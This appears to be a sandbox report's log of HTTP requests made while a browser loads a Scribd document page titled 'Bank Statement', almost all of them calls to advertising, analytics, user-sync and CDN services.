Source: global trafficHTTP traffic detected: GET /pixels/t2_9t33vcn2/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/static/main.MWY1YTg3NzcyMQ.js HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1739863011367&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=3db7dcde-f710-4d9a-a231-37baf4e66c84&aaid=&em=&external_id=&idfa=&integration=reddit&partner=&opt_out=0&sh=1280&sw=1024&v=rdt_4a8557f4&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /scribd-com/pubfig.min.js HTTP/1.1Host: a.pub.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /7.19.0/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /wi/config/10143699.json HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /s/c/a-05td?duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&euns=0&s=&version=v3.8.0&cd=.scribd.com&pv=70421afe-986b-44a4-9885-2988b048cebc HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1739863012307&aid=a-05td&se=e30&duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&tv=v3.8.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&wpn=lc-bundle&wpv=v3.8.0&cd=.scribd.com&c=PHRpdGxlPkJhbmsgU3RhdGVtZW50IHwgUERGIHwgRGViaXQgQ2FyZCB8IEF1dG9tYXRlZCBUZWxsZXIgTWFjaGluZTwvdGl0bGU-PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkJhbmsgU3RhdGVtZW50IC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgcmVhZCBvbmxpbmUgZm9yIGZyZWUuICI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODA2ODM4NDQ1L0JhbmstU3RhdGVtZW50Ij48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiB0aHNzTjEgVHJ1bmNhdGVkVGV4dC1tb2R1bGVfd3JhcHBlcl9mRzFLTTkiPjxwIGNsYXNzPSJUcnVuY2F0ZWRUZXh0LW1vZHVsZV9saW5lQ2xhbXBlZF84NXVsSEgiIHN0eWxlPSItLW1heC1saW5lczo1Ij5CYW5rIFN0YXRlbWVudDwvcD48L2Rpdj48L2gxPjxoMSBjbGFzcz0iXzM1am85bSIgZGF0YS1lMmU9ImRvY19wYWdlX3RpdGxlIj48ZGl2IGNsYXNzPSJfMnFzM3RmIFRydW5jYXRlZFRleHQtbW9kdWxlX3dyYXBwZXJfZkcxS005Ij48cCBjbGFzcz0iVHJ1bmNhdGVkVGV4dC1tb2R1bGVfbGluZUNsYW1wZWRfODV1bEhIIiBzdHlsZT0iLS1tYXgtbGluZXM6NSI-QmFuayBTdGF0ZW1lbnQ8L3A-PC9kaXY-PC9oMT48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiBUcnVuY2F0ZWRUZXh0LW1vZHVsZV93cmFwcGVyX2ZHMUtNOSI-PHAgY2xhc3M9IlRydW5jYXRlZFRleHQtbW9kdWxlX2xpbmVDbGFtcGVkXzg1dWxISCIgc3R5bGU9Ii0tbWF4LWxpbmVzOjUiPkJhbmsgU3RhdGVtZW50PC9wPjwvZGl2PjwvaDE-&pv=70421afe-986b-44a4-9885-2988b048cebc HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/681488845/149x198/c7ddc062e9/1716802451?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/706038976/149x198/b23f8188f7/1710539003?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/700745756/149x198/96c9d7ecea/1705973557?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/48495773/149x198/75bbdd6134/1387874969?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/624134665/149x198/f2a8b78d25/1675703756?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/684989787/149x198/3d21e84e60/1710549657?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/572094918/149x198/05a3fbea19/1716534898?v=12 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v2/sites/scribd-com/configs?env=PROD HTTP/1.1Host: d.pub.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?redir=https://i.liadm.com/s/88342?bidder_id%3D246498%26bidder_uuid%3D$UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /r/dd/id/L21rdC8xOTcxL2NpZC8xNzQ5ODczMjc1L3QvMg/url/https://i.liadm.com/s/53233?bidder_id=183658&bidder_uuid=$!%7BTURN_UUID%7D HTTP/1.1Host: d.turn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /dis/usersync.aspx?r=77&p=311&cp=liveintent&cu=1&url=https://i.liadm.com/s/28292?bidder_id%3D71340%26bidder_uuid%3D@@CRITEO_USERID@@ HTTP/1.1Host: dis.criteo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1739863012307&aid=a-05td&se=e30&duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&tv=v3.8.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&wpn=lc-bundle&wpv=v3.8.0&cd=.scribd.com&c=PHRpdGxlPkJhbmsgU3RhdGVtZW50IHwgUERGIHwgRGViaXQgQ2FyZCB8IEF1dG9tYXRlZCBUZWxsZXIgTWFjaGluZTwvdGl0bGU-PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkJhbmsgU3RhdGVtZW50IC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgcmVhZCBvbmxpbmUgZm9yIGZyZWUuICI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODA2ODM4NDQ1L0JhbmstU3RhdGVtZW50Ij48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiB0aHNzTjEgVHJ1bmNhdGVkVGV4dC1tb2R1bGVfd3JhcHBlcl9mRzFLTTkiPjxwIGNsYXNzPSJUcnVuY2F0ZWRUZXh0LW1vZHVsZV9saW5lQ2xhbXBlZF84NXVsSEgiIHN0eWxlPSItLW1heC1saW5lczo1Ij5CYW5rIFN0YXRlbWVudDwvcD48L2Rpdj48L2gxPjxoMSBjbGFzcz0iXzM1am85bSIgZGF0YS1lMmU9ImRvY19wYWdlX3RpdGxlIj48ZGl2IGNsYXNzPSJfMnFzM3RmIFRydW5jYXRlZFRleHQtbW9kdWxlX3dyYXBwZXJfZkcxS005Ij48cCBjbGFzcz0iVHJ1bmNhdGVkVGV4dC1tb2R1bGVfbGluZUNsYW1wZWRfODV1bEhIIiBzdHlsZT0iLS1tYXgtbGluZXM6NSI-QmFuayBTdGF0ZW1lbnQ8L3A-PC9kaXY-PC9oMT48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiBUcnVuY2F0ZWRUZXh0LW1vZHVsZV93cmFwcGVyX2ZHMUtNOSI-PHAgY2xhc3M9IlRydW5jYXRlZFRleHQtbW9kdWxlX2xpbmVDbGFtcGVkXzg1dWxISCIgc3R5bGU9Ii0tbWF4LWxpbmVzOjUiPkJhbmsgU3RhdGVtZW50PC9wPjwvZGl2PjwvaDE-&pv=70421afe-986b-44a4-9885-2988b048cebc&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync/liveintent/?cb=//i.liadm.com/s/35004?bidder_id%3D98254%26bidder_uuid%3D__ZUID__ HTTP/1.1Host: b1sync.zemanta.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?c=0aa2530f29e4f4a05b5d5d9bb35d60c2&p=93c1662463a616a7155169889dd99651&pid= HTTP/1.1Host: live.rezync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=liveintent&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https://i.liadm.com/s/81081?bidder_id=91218&bidder_uuid=$UID&gdpr=0 HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /7.19.0/rewriteframes.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/static/identify_45dd5971.js HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: GET /images/555008.gif?tm=120&r=26903146&v=114&cs=UTF-8&h=www.scribd.com&l=en-GB&S=5e543256c480ac577d30f76f9120eb74&uu=7446882fe2154b73aae6f4638a84d92&t=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%20Edg%2F117.0.2045.47&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=a4e7cd73f0e94331f2ea39a4c659e628&fph=c0f48806e2dc75d6fcbd91de7957bb6f&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=418711b9360f0ff97a5476ce480683b2&fad=124.04347527516074&fdm=8&fvf=chrome&fcg=srgb&ffc=false&fm=0&fc=0&frm=false&fhdr=false&fmf=8a6484bc3146bfed2f1b37578b8d6f00&fa=255&fte=false&fts=false&fce=true&fpdf=true&fl=04e4adf37ffcbe95bf074adf5cbd1d1b&ft=America/New_York&pf=120&pfe=40&z=z HTTP/1.1Host: hexagon-analytics.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
